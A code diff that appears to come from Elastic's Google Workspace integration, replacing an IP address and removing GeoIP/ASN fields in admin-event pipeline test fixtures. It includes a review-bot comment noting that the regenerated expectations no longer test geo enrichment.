+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHAT_SETTINGS","name":"CHANGE_CHAT_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chat.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chat.log-expected.json
index 0066b91141e..db163f62692 100644
--- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chat.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chat.log-expected.json @@ -10,7 +10,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -34,35 +34,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.821562500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"MEET_INTEROP_CREATE_GATEWAY\",\"parameters\":[{\"name\":\"GATEWAY_NAME\",\"value\":\"gateway\"}]}}", + "ingested": "2021-12-09T13:38:27.141313500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"MEET_INTEROP_CREATE_GATEWAY\",\"parameters\":[{\"name\":\"GATEWAY_NAME\",\"value\":\"gateway\"}]}}", "provider": "admin", "action": "MEET_INTEROP_CREATE_GATEWAY", "id": "1", 
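Review bot: The regenerated expectation in the `@@ -34,35 +34,17 @@` hunk removes `source.geo` and `source.as` outright for 67.43.156.13 rather than replacing them, so this test no longer asserts the GeoIP/ASN enrichment path at all; a pipeline whose geoip processors were accidentally dropped or mis-targeted would still pass. Swapping a real residential Comcast address for a documented test address is the right move, but if that address was chosen because the test GeoIP database bundled with the pipeline test runner covers it, the expected document should presumably carry whatever geo and AS fields that database returns for it, and their complete absence suggests the file was regenerated without that database available. Please confirm the admin pipeline still runs geoip processors against `source.ip` and regenerate the expectations with the test database present so a regression in those processors is still caught. The same pattern repeats in every `source` hunk of this file and of the calendar expectations above.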
@@ -92,7 +74,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -116,35 +98,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.821581600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"MEET_INTEROP_DELETE_GATEWAY\",\"parameters\":[{\"name\":\"GATEWAY_NAME\",\"value\":\"gateway\"}]}}", + "ingested": "2021-12-09T13:38:27.141321500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"MEET_INTEROP_DELETE_GATEWAY\",\"parameters\":[{\"name\":\"GATEWAY_NAME\",\"value\":\"gateway\"}]}}", "provider": "admin", "action": "MEET_INTEROP_DELETE_GATEWAY", "id": "1", @@ -174,7 +138,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -198,35 +162,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.821587100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"MEET_INTEROP_MODIFY_GATEWAY\",\"parameters\":[{\"name\":\"GATEWAY_NAME\",\"value\":\"gateway\"}]}}", + "ingested": "2021-12-09T13:38:27.141327Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"MEET_INTEROP_MODIFY_GATEWAY\",\"parameters\":[{\"name\":\"GATEWAY_NAME\",\"value\":\"gateway\"}]}}", "provider": "admin", "action": "MEET_INTEROP_MODIFY_GATEWAY", "id": "1", @@ -257,7 +203,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -281,35 +227,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.821591600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"CHANGE_CHAT_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "ingested": "2021-12-09T13:38:27.141332500Z", + "original": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"CHANGE_CHAT_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_CHAT_SETTING", "id": "1", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chromeos.log b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chromeos.log index 9c3bd721f39..cec0118eed7 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chromeos.log +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chromeos.log 
@@ -1,21 +1,21 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_ANDROID_APPLICATION_SETTING","parameters":[{"name":"APP_ID","value":"2345"},{"name":"CHROME_OS_SESSION_TYPE","value":"type"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_DEVICE_STATE","parameters":[{"name":"DEVICE_NEW_STATE","value":"new"},{"name":"DEVICE_PREVIOUS_STATE","value":"prev"},{"name":"DEVICE_SERIAL_NUMBER","value":"1234"},{"name":"DEVICE_TYPE","value":"type"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_APPLICATION_SETTING","parameters":[{"name":"APP_ID","value":"2345"},{"name":"CHROME_OS_SESSION_TYPE","value":"type"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"SEND_CHROME_OS_DEVICE_COMMAND","parameters":[{"name":"DEVICE_SERIAL_NUMBER","value":"2345"},{"name":"NEW_VALUE","value":"new"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_DEVICE_ANNOTATION","parameters":[{"name":"DEVICE_SERIAL_NUMBER","value":"2345"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_DEVICE_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_DEVICE_STATE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"DEVICE_SERIAL_NUMBER","value":"1234"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_PUBLIC_SESSION_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"INSERT_CHROME_OS_PRINT_SERVER","parameters":[{"name":"PRINT_SERVER_NAME","value":"server"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"DELETE_CHROME_OS_PRINT_SERVER","parameters":[{"name":"PRINT_SERVER_NAME","value":"server"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"UPDATE_CHROME_OS_PRINT_SERVER","parameters":[{"name":"PRINT_SERVER_NAME","value":"server"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"INSERT_CHROME_OS_PRINTER","parameters":[{"name":"PRINTER_NAME","value":"printer"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"DELETE_CHROME_OS_PRINTER","parameters":[{"name":"PRINTER_NAME","value":"printer"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"UPDATE_CHROME_OS_PRINTER","parameters":[{"name":"PRINTER_NAME","value":"printer"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SETTING_NAME","value":"setting"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_USER_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"ISSUE_DEVICE_COMMAND","parameters":[{"name":"DEVICE_COMMAND_DETAILS","multiValue":["command","-a"]},{"name":"DEVICE_SERIAL_NUMBER","value":"1234"},{"name":"DEVICE_TYPE","value":"type"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"MOVE_DEVICE_TO_ORG_UNIT_DETAILED","parameters":[{"name":"DEVICE_NEW_ORG_UNIT","value":"new"},{"name":"DEVICE_PREVIOUS_ORG_UNIT","value":"prev"},{"name":"DEVICE_SERIAL_NUMBER","value":"1234"},{"name":"DEVICE_TYPE","value":"type"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"REMOVE_CHROME_OS_APPLICATION_SETTINGS","parameters":[{"name":"APP_ID","value":"1234"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"UPDATE_DEVICE","parameters":[{"name":"DEVICE_SERIAL_NUMBER","value":"1234"},{"name":"DEVICE_TYPE","value":"type"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CONTACTS_SETTINGS","name":"CHANGE_CONTACTS_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_ANDROID_APPLICATION_SETTING","parameters":[{"name":"APP_ID","value":"2345"},{"name":"CHROME_OS_SESSION_TYPE","value":"type"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_DEVICE_STATE","parameters":[{"name":"DEVICE_NEW_STATE","value":"new"},{"name":"DEVICE_PREVIOUS_STATE","value":"prev"},{"name":"DEVICE_SERIAL_NUMBER","value":"1234"},{"name":"DEVICE_TYPE","value":"type"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_APPLICATION_SETTING","parameters":[{"name":"APP_ID","value":"2345"},{"name":"CHROME_OS_SESSION_TYPE","value":"type"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"SEND_CHROME_OS_DEVICE_COMMAND","parameters":[{"name":"DEVICE_SERIAL_NUMBER","value":"2345"},{"name":"NEW_VALUE","value":"new"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_DEVICE_ANNOTATION","parameters":[{"name":"DEVICE_SERIAL_NUMBER","value":"2345"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_DEVICE_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_DEVICE_STATE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"DEVICE_SERIAL_NUMBER","value":"1234"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_PUBLIC_SESSION_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"INSERT_CHROME_OS_PRINT_SERVER","parameters":[{"name":"PRINT_SERVER_NAME","value":"server"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"DELETE_CHROME_OS_PRINT_SERVER","parameters":[{"name":"PRINT_SERVER_NAME","value":"server"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"UPDATE_CHROME_OS_PRINT_SERVER","parameters":[{"name":"PRINT_SERVER_NAME","value":"server"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"INSERT_CHROME_OS_PRINTER","parameters":[{"name":"PRINTER_NAME","value":"printer"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"DELETE_CHROME_OS_PRINTER","parameters":[{"name":"PRINTER_NAME","value":"printer"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"UPDATE_CHROME_OS_PRINTER","parameters":[{"name":"PRINTER_NAME","value":"printer"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_USER_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} 